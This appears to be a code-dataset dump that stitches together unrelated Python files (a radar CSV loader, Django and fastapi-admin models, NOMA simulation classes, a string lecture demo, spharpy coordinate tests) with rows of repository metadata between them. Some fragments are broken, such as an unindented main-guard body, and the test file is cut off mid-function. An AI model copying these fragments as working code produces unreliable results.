    for ky in keys_list:
        # literal_eval safely turns "[1, 2]" into [1, 2]
        data_dict[ky] = [ast.literal_eval(x) for x in data_dict[ky]]
    return data_dict
# run the code
def main(orient="list"):
    """Driver: configure logging and convert one hard-coded fitacf csv to a dict."""
    # Set the logging level
    logging.getLogger().setLevel(logging.WARNING)

    # input parameters — time filters disabled by default (whole file is read)
    stime = None
    etime = None
    #stime = dt.datetime(2012,12,31)
    #etime = dt.datetime(2012,12,31, 1, 0)
    csv_sep = "|"		# Delimiter to use

    # Convert dmap format to csv — source file produced by an earlier step.
    fdir = "./data/tmp/"
    #fname = fdir + "20121231.000000.20130101.000000.fhe.fitacf.csv"
    fname = fdir + "20130110.180000.20130111.180000.bks.fitacf.csv"
    #data_dict = csv_to_dict(fname, stime=stime, etime=etime, sep=csv_sep)
    data_dict = csv_to_dict(fname, stime=stime, etime=etime, sep=csv_sep, orient=orient)
    return data_dict
if __name__ == "__main__":
data_dict = main()
| 29.971698 | 88 | 0.610324 | 469 | 3,177 | 4.008529 | 0.362473 | 0.051064 | 0.014362 | 0.02234 | 0.123936 | 0.094681 | 0.07766 | 0.07766 | 0.054255 | 0.054255 | 0 | 0.036812 | 0.273214 | 3,177 | 105 | 89 | 30.257143 | 0.777393 | 0.299969 | 0 | 0.052632 | 0 | 0 | 0.187687 | 0.027496 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.131579 | null | null | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2561c0cbb1b53736d4de2696d2a27f845b5e75a6 | 408 | py | Python | torstream/peerflix_test.py | PandaWhoCodes/torstream | a619b382677cf70e7eae3bff8800741f84da475b | [
"MIT"
] | 3 | 2018-04-03T04:13:22.000Z | 2021-11-10T09:03:29.000Z | torstream/peerflix_test.py | PandaWhoCodes/torstream | a619b382677cf70e7eae3bff8800741f84da475b | [
"MIT"
] | null | null | null | torstream/peerflix_test.py | PandaWhoCodes/torstream | a619b382677cf70e7eae3bff8800741f84da475b | [
"MIT"
] | null | null | null | import os
def test_system():
    """Check that npm and peerflix are installed; install peerflix if missing.

    ``os.system`` returns the command's exit status — non-zero means the
    command failed or the binary is missing from PATH.
    """
    if os.system('npm --version') != 0:
        # Fixed the duplicated word in the original message
        # ("not installed installed").
        print('NPM not installed, please read the Readme file for more information.')
        # SystemExit(1) instead of the interactive-only exit() builtin: it
        # always exists and reports failure with a non-zero exit code
        # (exit() would have exited with status 0).
        raise SystemExit(1)
    if os.system('peerflix --version') != 0:
        print('Peerflix not installed, installing..')
        os.system('npm install -g peerflix')
| 34 | 95 | 0.642157 | 56 | 408 | 4.660714 | 0.589286 | 0.091954 | 0.076628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00639 | 0.232843 | 408 | 11 | 96 | 37.090909 | 0.827476 | 0.17402 | 0 | 0 | 0 | 0 | 0.507553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | true | 0 | 0.125 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25635d49759987bc94c91b4f76a39a69baa8ed0c | 546 | py | Python | apps/organizations/migrations/0002_auto_20191013_0307.py | islandowner-web/IT-MOOC | f361512e6ff81a6e120ee808b20d78a79e325f5c | [
"MIT"
] | 9 | 2020-01-30T16:13:00.000Z | 2022-03-22T03:49:18.000Z | apps/organizations/migrations/0002_auto_20191013_0307.py | islandowner-web/IT-MOOC | f361512e6ff81a6e120ee808b20d78a79e325f5c | [
"MIT"
] | 8 | 2020-04-10T17:24:09.000Z | 2022-03-23T10:38:27.000Z | apps/organizations/migrations/0002_auto_20191013_0307.py | islandowner-web/IT-MOOC | f361512e6ff81a6e120ee808b20d78a79e325f5c | [
"MIT"
] | 2 | 2020-07-05T13:42:12.000Z | 2020-12-17T05:50:48.000Z | # Generated by Django 2.2 on 2019-10-13 03:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('organizations', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='courseorg',
old_name='course_name',
new_name='course_nums',
),
migrations.AlterField(
model_name='city',
name='name',
field=models.CharField(max_length=20, verbose_name='城市名'),
),
]
| 22.75 | 70 | 0.575092 | 55 | 546 | 5.545455 | 0.709091 | 0.059016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05305 | 0.309524 | 546 | 23 | 71 | 23.73913 | 0.755968 | 0.078755 | 0 | 0.117647 | 1 | 0 | 0.133733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2567e292cd2f27452ebf517a8089483384418582 | 898 | py | Python | Sim_ATAV/vehicle_control/controller_commons/perception/object_creation/lidar_object.py | SahilDhull/autonomous | 378fc7d6c5a9c34c4e915f080fb78ed5c11195d6 | [
"MIT"
] | 3 | 2020-02-28T12:04:26.000Z | 2022-02-27T00:42:56.000Z | Sim_ATAV/vehicle_control/controller_commons/perception/object_creation/lidar_object.py | SahilDhull/autonomous | 378fc7d6c5a9c34c4e915f080fb78ed5c11195d6 | [
"MIT"
] | null | null | null | Sim_ATAV/vehicle_control/controller_commons/perception/object_creation/lidar_object.py | SahilDhull/autonomous | 378fc7d6c5a9c34c4e915f080fb78ed5c11195d6 | [
"MIT"
] | null | null | null | """Defines LidarObject class.
----------------------------------------------------------------------------------------------------------
This file is part of Sim-ATAV project and licensed under MIT license.
Copyright (c) 2018 Cumhur Erkan Tuncali, Georgios Fainekos, Danil Prokhorov, Hisahiro Ito, James Kapinski.
For questions please contact:
C. Erkan Tuncali (etuncali [at] asu.edu)
----------------------------------------------------------------------------------------------------------
"""
class LidarObject(object):
    """LidarObject class defines features of the object detected by LIDAR.

    In the original file this docstring appeared AFTER the class constants,
    where it was a no-op string expression and never populated ``__doc__``;
    it is now the first statement, as Python requires.
    """

    # Object-class codes assigned to a detection.
    OBJECT_CAR = 0
    OBJECT_PEDESTRIAN = 1
    OBJECT_BIKE = 2
    OBJECT_TRUCK = 3

    def __init__(self, lidar_cluster, object_class, relative_position):
        """Bundle a detected LIDAR cluster with its class and relative position.

        :param lidar_cluster: point cluster produced by the LIDAR clustering step
        :param object_class: one of the OBJECT_* codes above
        :param relative_position: object position relative to the sensor
            (coordinate convention defined by the caller — confirm upstream)
        """
        self.lidar_cluster = lidar_cluster
        self.object_class = object_class
        self.relative_position = relative_position
| 39.043478 | 106 | 0.562361 | 90 | 898 | 5.422222 | 0.644444 | 0.07377 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010444 | 0.146993 | 898 | 22 | 107 | 40.818182 | 0.626632 | 0.54343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
256ac54ac312bf9d725dec882b64b477ddf93c2f | 1,739 | py | Python | nomalib/devices.py | joeugenio/noma_simulation | 4182509fccc01b1999998ff1907ea834dd677519 | [
"MIT"
] | 1 | 2019-11-04T01:15:06.000Z | 2019-11-04T01:15:06.000Z | nomalib/devices.py | joeugenio/noma_simulation | 4182509fccc01b1999998ff1907ea834dd677519 | [
"MIT"
] | null | null | null | nomalib/devices.py | joeugenio/noma_simulation | 4182509fccc01b1999998ff1907ea834dd677519 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Federal University of Campina Grande (UFCG)
# Author: Joel Eugênio Cordeiro Junior
# Date: 28/08/2017
# Last update: 30/01/2018
# Version: 1.0
# Python module for NOMA communications simulations
# The devices classes are declared here
# modules
import numpy as np
import constants as const
# classes
class Coordinate:
    """A plain 2-D coordinate with x and y components."""

    def __init__(self, x, y):
        self.x = x
        self.y = y
class BSAntenna:
    """Base Station Antenna."""

    def __init__(self, theta_min, bs_gain=const.BSG):
        # theta_min: antenna orientation angle in radians — presumably the
        # sector boresight; confirm against the callers.
        self.theta_min = theta_min
        self.bs_gain = bs_gain

    def radiation_pattern(self, theta, theta3db=65, att_max=20):
        """Return the pattern attenuation (dB, <= 0) at angle *theta* (radians).

        Implements A(theta) = -min(12 * (theta / theta_3dB)^2, A_max) with
        *theta3db* given in degrees — the 3GPP-style sector antenna pattern.
        """
        attenuation = 12 * (theta / np.radians(theta3db)) ** 2
        # Builtin min() instead of np.min over a temporary 2-element list:
        # same value, no throwaway array/list allocation.
        return -min(attenuation, att_max)
class UEAntenna:
    """User Equipment Antenna (omni-directional)."""

    def __init__(self, ue_gain=const.UEG):
        self.ue_g = ue_gain

    def radiation_pattern(self, theta):
        """Omni-directional pattern: 0 dB attenuation at every angle."""
        return 0
class BaseStation:
    """Base Station - eNodeB."""

    def __init__(self, id: str, coord: Coordinate, hight=const.BSH, power=const.BSPW, n_sector=3):
        # NOTE(review): the original default for n_sector was the incomplete
        # expression `const.` — a syntax error. 3 sectors is the usual eNodeB
        # layout; confirm the intended constant name in `constants`.
        self.id = id
        self.h = hight
        self.pwr = power
        self.n_sec = n_sector
        self.coord = coord
        self.ue_id = []  # ids of UEs attached to this base station
class UserEquipment:
    """Equipment of User (UE)."""

    def __init__(self, id: str, coord: Coordinate, hight=const.UEH, power=const.UEPW):
        # NOTE(review): the original defaults were the bare names UEH/UEPW,
        # which are undefined at module scope; every sibling class reads its
        # defaults from `const`, so these are taken from there as well.
        self.id = id
        self.coord = coord
        self.h = hight
        self.pwr = power
        self.bs_id = None  # id of the serving base station, set on attachment

    def received_power(self):
        """Received power at the UE — not implemented yet.

        The original body (`rx_pwr = tx_pwr - np.max()`) referenced the
        undefined name `tx_pwr` and called np.max with no arguments, so it
        could never run; raising explicitly makes the gap visible instead of
        failing with an unrelated NameError/TypeError.
        """
        raise NotImplementedError("received_power: link-budget computation not implemented yet")
| 26.348485 | 101 | 0.59977 | 230 | 1,739 | 4.356522 | 0.465217 | 0.03493 | 0.05489 | 0.035928 | 0.179641 | 0.123753 | 0.123753 | 0.071856 | 0 | 0 | 0 | 0.0249 | 0.284071 | 1,739 | 65 | 102 | 26.753846 | 0.77992 | 0.162162 | 0 | 0.228571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057143 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
256c5a67dd5bb18b8235b86ade8db32db44789e2 | 1,275 | py | Python | lecture_demos/13_Lecture_Demo.py | theCodingProfessor/intro_to_Python | 87c3c4816530f4ca07091d17acf645f3261ecaea | [
"MIT"
] | null | null | null | lecture_demos/13_Lecture_Demo.py | theCodingProfessor/intro_to_Python | 87c3c4816530f4ca07091d17acf645f3261ecaea | [
"MIT"
] | null | null | null | lecture_demos/13_Lecture_Demo.py | theCodingProfessor/intro_to_Python | 87c3c4816530f4ca07091d17acf645f3261ecaea | [
"MIT"
] | null | null | null | # Code Demo for 13 Lecture
# Working with Python Strings
# CIS 135 - Code Demo File
# Lecture example showing string contatenation
# --- String concatenation --------------------------------------------------
firstName = "Peter"
lastName = "Parker"
# Fixed the printed typos "Contcatenation" / "Pyton" from the original.
print("\nString Concatenation in Python uses the + operator")
print(f'First Name = {firstName}')
print(f'Last Name = {lastName}')
print("Peter Parker can be concatenated as 'firstName' + ' ' + 'lastName'")
print("Hello,", firstName + ' ' + lastName)

# --- Slicing examples on JJC -----------------------------------------------
JJC = "Joliet Junior College"
print('\nJJC = "Joliet Junior College"')
print("\nExtract 'Joliet' from the variable JJC")
print(JJC[0:6])  # this returns the first six characters
print("\nExtract 'College' from the variable JJC")
print(JJC[-7:])  # this returns the final seven characters
print("\nExtract 'Junior' from the variable JJC")
print(JJC[7:-7])  # middle slice: drops the first 7 and last 7 characters
# (the original comment above wrongly said "final seven characters")

# --- More slicing on a plain alphabet string -------------------------------
alphas = 'abcdefghi'
print(f'\nThe variable alphas = {alphas}')
# Label fixed: the original printed "alphas[1:3]" while slicing [4:8].
print('alphas[4:8] extract characters ', alphas[4:8])
print('alphas[:3] = will extract characters ', alphas[:3])
print('alphas[-2:] = will extract characters ', alphas[-2:])
print('alphas[-3:-2] = will extract characters ', alphas[-3:-2])

# --- Stripping whitespace --------------------------------------------------
this_string = " some text "
print(this_string.lstrip())
print(this_string.rstrip())
print(this_string.rstrip()) | 35.416667 | 76 | 0.689412 | 171 | 1,275 | 5.122807 | 0.403509 | 0.091324 | 0.105023 | 0.061644 | 0.267123 | 0.170091 | 0.140411 | 0 | 0 | 0 | 0 | 0.020716 | 0.167059 | 1,275 | 36 | 77 | 35.416667 | 0.804143 | 0.203922 | 0 | 0 | 0 | 0 | 0.578189 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.791667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
256cdec8b8c8d411042c64b792a32264dd68675a | 2,190 | py | Python | examples/models.py | cat-x/fastapi-admin | d9496b7e487134e5df1691df6652dca1c405919a | [
"Apache-2.0"
] | 1 | 2021-02-14T12:08:32.000Z | 2021-02-14T12:08:32.000Z | examples/models.py | KonstantinKlepikov/fastapi-admin | a1baa185a77252f10afe1bd76e5ff3791158be98 | [
"Apache-2.0"
] | null | null | null | examples/models.py | KonstantinKlepikov/fastapi-admin | a1baa185a77252f10afe1bd76e5ff3791158be98 | [
"Apache-2.0"
] | 2 | 2020-10-23T03:47:22.000Z | 2020-10-26T10:24:56.000Z | import datetime
from tortoise import Model, fields
from fastapi_admin.models import AbstractAdminLog, AbstractPermission, AbstractRole, AbstractUser
from .enums import ProductType, Status
class User(AbstractUser):
    """Admin user model extending fastapi-admin's AbstractUser with
    profile fields and table-styling helpers."""
    last_login = fields.DatetimeField(description="Last Login", default=datetime.datetime.now)
    avatar = fields.CharField(max_length=200, default="")  # URL/path of avatar image
    intro = fields.TextField(default="")  # free-form user introduction
    created_at = fields.DatetimeField(auto_now_add=True)  # set once on creation
    def __str__(self):
        """Human-readable identifier in the form "<pk>#<username>"."""
        return f"{self.pk}#{self.username}"
    def rowVariant(self) -> str:
        """Row styling hint: "warning" for inactive users, "" otherwise."""
        if not self.is_active:
            return "warning"
        return ""
    def cellVariants(self) -> dict:
        """Per-cell styling hints: highlight the "intro" cell for active users."""
        if self.is_active:
            return {
                "intro": "info",
            }
        return {}
    class PydanticMeta:
        # Expose the two styling helpers as computed fields in pydantic output.
        computed = ("rowVariant", "cellVariants")
class Permission(AbstractPermission):
    """
    Permission model; must inherit from AbstractPermission.
    """
class Role(AbstractRole):
    """
    Role model; must inherit from AbstractRole.
    """
class AdminLog(AbstractAdminLog):
    """
    Admin action log; must inherit from AbstractAdminLog.
    """
class Category(Model):
    """Product category identified by a slug and a display name."""
    slug = fields.CharField(max_length=200)
    name = fields.CharField(max_length=200)
    created_at = fields.DatetimeField(auto_now_add=True)  # set once on creation
    def __str__(self):
        # Human-readable identifier: "<pk>#<name>".
        return f"{self.pk}#{self.name}"
class Product(Model):
    """Product catalogue entry, linked to one or more categories."""
    categories = fields.ManyToManyField("models.Category")
    name = fields.CharField(max_length=50)
    view_num = fields.IntField(description="View Num")  # view counter
    sort = fields.IntField()  # ordering weight
    is_reviewed = fields.BooleanField(description="Is Reviewed")
    type = fields.IntEnumField(ProductType, description="Product Type")
    image = fields.CharField(max_length=200)  # image URL/path
    body = fields.TextField()
    created_at = fields.DatetimeField(auto_now_add=True)  # set once on creation
    def __str__(self):
        # Human-readable identifier: "<pk>#<name>".
        return f"{self.pk}#{self.name}"
class Config(Model):
    """Key/value configuration entry with a JSON payload and on/off status."""
    label = fields.CharField(max_length=200)  # display label
    key = fields.CharField(max_length=20)     # lookup key
    value = fields.JSONField()
    # Status enum field; entries default to "on".
    status: Status = fields.IntEnumField(Status, default=Status.on)
    def __str__(self):
        # Human-readable identifier: "<pk>#<label>".
        return f"{self.pk}#{self.label}"
| 25.764706 | 97 | 0.677169 | 241 | 2,190 | 5.995851 | 0.344398 | 0.072664 | 0.087197 | 0.116263 | 0.289965 | 0.174394 | 0.174394 | 0.174394 | 0.155709 | 0.155709 | 0 | 0.010951 | 0.207763 | 2,190 | 84 | 98 | 26.071429 | 0.821902 | 0.045205 | 0 | 0.176471 | 0 | 0 | 0.089487 | 0.043521 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.078431 | 0.078431 | 0.901961 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
256ed099b27158e9c8e19a42a3af192f85d25b09 | 754 | py | Python | dbtools/admin.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 1 | 2021-02-19T18:43:35.000Z | 2021-02-19T18:43:35.000Z | dbtools/admin.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 72 | 2021-02-16T23:37:09.000Z | 2021-05-10T21:58:31.000Z | dbtools/admin.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 2 | 2021-09-05T03:00:05.000Z | 2021-09-13T14:38:26.000Z | from django.contrib import admin
# Register your models here.
from .models import *
class GroupFormerAdmin(admin.ModelAdmin):
    # Enable admin search by class section.
    search_fields = ['class_section']
class ProjectAdmin(admin.ModelAdmin):
    # Enable admin search by project name.
    search_fields = ['project_name']
class AttributeAdmin(admin.ModelAdmin):
    # Default admin behaviour; no customisation needed.
    pass
class ParticipantAdmin(admin.ModelAdmin):
    # Default admin behaviour; no customisation needed.
    pass
class AttrChoiceAdmin(admin.ModelAdmin):
    # Default admin behaviour; no customisation needed.
    pass
class ProjChoiceAdmin(admin.ModelAdmin):
    # Default admin behaviour; no customisation needed.
    pass
# Register each model with its admin class so it appears in the Django admin.
admin.site.register(GroupFormer, GroupFormerAdmin)
admin.site.register(Project, ProjectAdmin)
admin.site.register(Attribute, AttributeAdmin)
admin.site.register(Participant, ParticipantAdmin)
admin.site.register(attribute_selection, AttrChoiceAdmin)
admin.site.register(project_selection, ProjChoiceAdmin)
| 24.322581 | 57 | 0.802387 | 80 | 754 | 7.4875 | 0.35 | 0.15025 | 0.170284 | 0.1202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106101 | 754 | 30 | 58 | 25.133333 | 0.888724 | 0.034483 | 0 | 0.2 | 0 | 0 | 0.034435 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c25101bc085a4fe887123f30425feea4b414eb1c | 246 | py | Python | shortener/urls.py | warlock57/mybitly | 0afbb3830f3f9a867503509f87d7b5d3dc5480ff | [
"MIT"
] | null | null | null | shortener/urls.py | warlock57/mybitly | 0afbb3830f3f9a867503509f87d7b5d3dc5480ff | [
"MIT"
] | null | null | null | shortener/urls.py | warlock57/mybitly | 0afbb3830f3f9a867503509f87d7b5d3dc5480ff | [
"MIT"
] | null | null | null | from django.conf.urls import url
from .views import (
    HomeView,
    MyBitlyRedirectView,
)
# URL routes: the site root, and a catch-all shortcode that redirects
# to the stored long URL.
urlpatterns = [
    url(r'^$', HomeView.as_view(), name='home'),
    url(r'^(?P<shortcode>[\w-]+)$', MyBitlyRedirectView.as_view(), name='short'),
]
| 20.5 | 81 | 0.638211 | 29 | 246 | 5.344828 | 0.655172 | 0.051613 | 0.129032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158537 | 246 | 11 | 82 | 22.363636 | 0.748792 | 0 | 0 | 0 | 0 | 0 | 0.138211 | 0.093496 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c25488d8cf10c2a7ff35bb7be0fbcb6b173f35ff | 7,805 | py | Python | tests/test_coordinates.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | tests/test_coordinates.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | tests/test_coordinates.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | import numpy as np
import numpy.testing as npt
import pytest
import spharpy
from spharpy.samplings.coordinates import Coordinates, SamplingSphere
from spharpy.samplings import sph2cart, cart2sph, cart2latlon
def test_coordinates_init():
    """A bare Coordinates() call should construct a Coordinates object."""
    coords = Coordinates()
    assert isinstance(coords, Coordinates)
def test_coordinates_init_val():
    """Coordinates should accept scalar x, y, z positional values."""
    coords = Coordinates(1, 0, 0)
    assert isinstance(coords, Coordinates)
def test_coordinates_init_incomplete():
    """Mismatched coordinate array lengths must raise a ValueError."""
    x = [1, 2]
    y = 1
    z = 1
    # pytest.raises itself fails the test if no ValueError is raised, so the
    # previous pytest.fail() inside the block was dead code (never reached
    # when the exception fires) and has been removed.
    with pytest.raises(ValueError):
        Coordinates(x, y, z)
def test_coordinates_init_from_cartesian():
    """from_cartesian should store x, y, z verbatim."""
    x = 1
    y = 0
    z = 0
    coords = Coordinates.from_cartesian(x, y, z)
    npt.assert_allclose(coords._x, x)
    npt.assert_allclose(coords._y, y)
    npt.assert_allclose(coords._z, z)
def test_coordinates_init_from_spherical():
    """from_spherical should invert cart2sph back to the Cartesian point."""
    x = 1
    y = 0
    z = 0
    rad, theta, phi = cart2sph(x, y, z)
    coords = Coordinates.from_spherical(rad, theta, phi)
    # use atol here because of numerical rounding issues introduced in
    # the coordinate conversion
    npt.assert_allclose(coords._x, x, atol=1e-15)
    npt.assert_allclose(coords._y, y, atol=1e-15)
    npt.assert_allclose(coords._z, z, atol=1e-15)
def test_coordinates_init_from_array_spherical():
    """from_array with coordinate_system='spherical' should round-trip."""
    rad = [1., 1., 1., 1.]
    ele = [np.pi/2, np.pi/2, 0, np.pi/2]
    azi = [0, np.pi/2, 0, np.pi/4]
    points = np.array([rad, ele, azi])
    coords = Coordinates.from_array(points, coordinate_system='spherical')
    npt.assert_allclose(coords.radius, rad, atol=1e-15)
    npt.assert_allclose(coords.elevation, ele, atol=1e-15)
    npt.assert_allclose(coords.azimuth, azi, atol=1e-15)
def test_coordinates_init_from_array_cartesian():
    """from_array defaults to Cartesian input (a 3 x n array)."""
    x = [1, 0, 0, 0]
    y = [0, 1, 0, 0]
    z = [0, 0, 1, 0]
    points = np.array([x, y, z])
    coords = Coordinates.from_array(points)
    npt.assert_allclose(coords._x, x, atol=1e-15)
    npt.assert_allclose(coords._y, y, atol=1e-15)
    npt.assert_allclose(coords._z, z, atol=1e-15)
def test_getter_x():
    """The x property should reflect the internal _x array."""
    x = np.array([1, 0], dtype=np.double)
    coords = Coordinates()
    coords._x = x
    npt.assert_allclose(coords.x, x)
def test_getter_y():
    """The y property should reflect the internal _y array."""
    y = np.array([1, 0], dtype=np.double)
    coords = Coordinates()
    coords._y = y
    npt.assert_allclose(coords.y, y)
def test_getter_z():
    """The z property should reflect the internal _z array."""
    z = np.array([1, 0], dtype=np.double)
    coords = Coordinates()
    coords._z = z
    npt.assert_allclose(coords.z, z)
def test_setter_x():
    """Assigning the x property should update the internal _x array."""
    value = np.array([1.0, 1], dtype=np.double)
    coords = Coordinates()
    coords.x = value
    npt.assert_allclose(value, coords._x)
def test_setter_y():
    """Assigning the y property should update the internal _y array."""
    value = np.array([1.0, 1], dtype=np.double)
    coords = Coordinates()
    coords.y = value
    npt.assert_allclose(value, coords._y)
def test_setter_z():
    """Assigning the z property should update the internal _z array."""
    value = np.array([1.0, 1], dtype=np.double)
    coords = Coordinates()
    coords.z = value
    npt.assert_allclose(value, coords._z)
def test_getter_ele():
    """Point (1, 0, 0) should have elevation pi/2."""
    value = np.pi/2
    coords = Coordinates()
    coords.z = 0
    coords.y = 0
    coords.x = 1
    npt.assert_allclose(coords.elevation, value)
def test_getter_radius():
    """Point (0, 1, 0) should have radius 1."""
    value = 1
    coords = Coordinates()
    coords.z = 0
    coords.y = 1
    coords.x = 0
    npt.assert_allclose(coords.radius, value)
def test_getter_azi():
    """Point (0, 1, 0) should have azimuth pi/2."""
    azi = np.pi/2
    coords = Coordinates()
    coords.z = 0
    coords.y = 1
    coords.x = 0
    npt.assert_allclose(coords.azimuth, azi)
def test_setter_rad():
    """Shrinking the radius of (1, 0, 0) to 0.5 should rescale x."""
    eps = np.spacing(1)
    rad = 0.5
    x = 0.5
    y = 0
    z = 0
    coords = Coordinates(1, 0, 0)
    coords.radius = rad
    npt.assert_allclose(coords._x, x, atol=eps)
    npt.assert_allclose(coords._y, y, atol=eps)
    npt.assert_allclose(coords._z, z, atol=eps)
def test_setter_ele():
    """Setting elevation 0 on (1, 0, 0) should rotate the point to (0, 0, 1)."""
    eps = np.spacing(1)
    ele = 0
    x = 0
    y = 0
    z = 1
    coords = Coordinates(1, 0, 0)
    coords.elevation = ele
    npt.assert_allclose(coords._x, x, atol=eps)
    npt.assert_allclose(coords._y, y, atol=eps)
    npt.assert_allclose(coords._z, z, atol=eps)
def test_setter_azi():
    """Setting azimuth pi/2 on (1, 0, 0) should rotate the point to (0, 1, 0)."""
    eps = np.spacing(1)
    azi = np.pi/2
    x = 0
    y = 1
    z = 0
    coords = Coordinates(1, 0, 0)
    coords.azimuth = azi
    npt.assert_allclose(coords._x, x, atol=eps)
    npt.assert_allclose(coords._y, y, atol=eps)
    npt.assert_allclose(coords._z, z, atol=eps)
def test_getter_latitude():
    """latitude should match the cart2latlon conversion."""
    x = 1
    y = 0
    z = 0.5
    height, lat, lon = cart2latlon(x, y, z)
    coords = Coordinates(x, y, z)
    npt.assert_allclose(coords.latitude, lat)
def test_getter_longitude():
    """longitude should match the cart2latlon conversion."""
    x = 1
    y = 0
    z = 0.5
    height, lat, lon = cart2latlon(x, y, z)
    coords = Coordinates(x, y, z)
    npt.assert_allclose(coords.longitude, lon)
def test_getter_cartesian():
    """cartesian should return the stacked (3, n) x/y/z array."""
    x = [1, 0, 0, 0]
    y = [0, 1, 0, 0]
    z = [0, 0, 1, 0]
    coords = Coordinates(x, y, z)
    ref = np.vstack((x, y, z))
    npt.assert_allclose(coords.cartesian, ref)
def test_setter_cartesian():
    """Assigning cartesian should round-trip through the getter."""
    x = np.array([1, 0, 0, 0])
    y = np.array([0, 1, 0, 0])
    z = np.array([0, 0, 1, 0])
    cart = np.vstack((x, y, z))
    coords = Coordinates()
    coords.cartesian = cart
    npt.assert_allclose(coords.cartesian, cart)
def test_getter_spherical():
    """spherical should return the stacked (3, n) rad/theta/phi array."""
    x = np.array([1, 0, 0, 1], dtype=np.float64)
    y = np.array([0, 1, 0, 1], dtype=np.float64)
    z = np.array([0, 0, 1, 1], dtype=np.float64)
    rad, theta, phi = cart2sph(x, y, z)
    coords = Coordinates(x, y, z)
    ref = np.vstack((rad, theta, phi))
    npt.assert_allclose(coords.spherical, ref)
def test_setter_spherical():
    """Assigning the spherical property should update the Cartesian state."""
    tol = np.spacing(1)
    x_ref = np.array([1, 0, 0, 1], dtype=np.float64)
    y_ref = np.array([0, 1, 0, 1], dtype=np.float64)
    z_ref = np.array([0, 0, 1, 1], dtype=np.float64)
